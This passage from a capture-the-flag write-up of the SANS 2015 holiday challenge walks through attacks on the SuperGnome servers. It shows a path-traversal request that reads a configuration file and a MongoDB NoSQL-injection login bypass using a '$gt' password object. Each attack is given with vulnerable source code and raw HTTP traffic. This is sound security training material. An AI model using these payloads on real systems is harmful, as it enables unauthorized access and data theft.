    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt;
    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GIYH::ADMIN PORT V.01&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This time, the parameter without any sanitization is &lt;code&gt;filen&lt;/code&gt;, which is
the name of our new settings file. Since it's not sanitized, we can put
special characters, like &lt;code&gt;/&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/settings&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52.34.3.80&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/\*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://52.34.3.80/settings&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=jle7GDOGWl2hB4Upp5ry&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;26&lt;/span&gt;

filen=foo.png/foo&amp;amp;file=bar
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="sg02_folder_creation_success.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg02_folder_creation_success.png" /&gt;
&lt;p&gt;Then we can use the path traversal vulnerability to recover the configuration
file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/cam?camera=../upload/YoGjNkHo/foo.png/../../../../../../gnome/www/files/gnome.conf&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52.34.3.80&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/\*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=jle7GDOGWl2hB4Upp5ry&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GIYH::SuperGnome by AtnasCorp&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 20 Dec 2015 18:58:59 GMT&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;339&lt;/span&gt;

Gnome Serial Number: XKCD988
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-02
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The flag for this SuperGnome is &lt;code&gt;XKCD988&lt;/code&gt;
(&lt;a class="reference external" href="https://xkcd.com/988/"&gt;geeky reference&lt;/a&gt;).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id3"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://52.64.191.71/"&gt;SuperGnome03&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We can't even connect to this SuperGnome with our stolen credentials!&lt;/p&gt;
&lt;img alt="sg03_failed_login.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg03_failed_login.png" /&gt;
&lt;p&gt;That means that we have to bypass authentication somehow. The usual way is
using an SQL injection. But since the DBMS is MongoDB, we can't use traditional
SQL injection: we have to use NoSQL injection.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File www/routes/index.js, line 105&lt;/span&gt;
&lt;span class="c1"&gt;// LOGIN POST&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[];&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;findOne&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="c1"&gt;// STUART: Removed this in favor of below.  Really guys?&lt;/span&gt;
&lt;/span&gt;  &lt;span class="c1"&gt;//db.get(&amp;#39;users&amp;#39;).findOne({username: (req.body.username || &amp;quot;&amp;quot;).toString(10), password: (req.body.password || &amp;quot;&amp;quot;).toString(10)}, function (err, user) { // LOUISE: allow passwords longer than 10 chars&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Invalid username and password: &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Invalid username or password!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GIYH::ADMIN PORT V.01&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cookies&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;sessionid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;gen_session&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
      &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;logged_in&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;user_level&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_level&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
      &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;User level:&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_level&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cookie&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sessionid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;writeHead&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;301&lt;/span&gt;&lt;span class="p"&gt;,{&lt;/span&gt; &lt;span class="nx"&gt;Location&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the parameters &lt;code&gt;username&lt;/code&gt; and &lt;code&gt;password&lt;/code&gt; are not
converted to string before being used in the NoSQL query. This means that we
can send our login parameters in JSON, and they will automatically be converted
to a JavaScript object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52.64.191.71&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/\*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://52.64.191.71/?logout=1&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=9VdoAi2pOEvmdCfZz0y9&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;45&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;username&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;admin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;password&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;$gt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;301&lt;/span&gt; &lt;span class="ne"&gt;Moved Permanently&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GIYH::SuperGnome by AtnasCorp&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=5KriPZf9AP8l8MGBVpA8; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Location&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;/&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 20 Dec 2015 22:44:35 GMT&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This request means that the username must be &amp;quot;admin&amp;quot;, and that the associated
password must be greater than an empty string. Since such a user exists, the
application considers that we provided valid credentials, and happily opens
an authenticated web session.&lt;/p&gt;
&lt;p&gt;We can then get the configuration file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/files?d=gnome.conf&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52.64.191.71&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/\*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://52.64.191.71/files&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=5KriPZf9AP8l8MGBVpA8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GIYH::SuperGnome by AtnasCorp&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 20 Dec 2015 22:44:57 GMT&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;339&lt;/span&gt;

Gnome Serial Number: THX1138
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-03
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The flag for this SuperGnome is &lt;code&gt;THX1138&lt;/code&gt;
(&lt;a class="reference external" href="https://en.wikipedia.org/wiki/THX_1138"&gt;geeky reference&lt;/a&gt;).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id4"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://52.192.152.132"&gt;SuperGnome04&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We can connect to this SuperGnome with our credentials (whew).
However, when we try to download the gnome.conf file from the
files tab, we get an error message:&lt;/p&gt;
&lt;img alt="sg04_download_fail.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg04_download_fail.png" /&gt;
&lt;p&gt;Fortunately for us, this SuperGnome suffers from a remote code execution:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File www/routes/index.js, line 153&lt;/span&gt;
&lt;span class="c1"&gt;// FILES UPLOAD&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/files&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;upload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;single&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;file&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
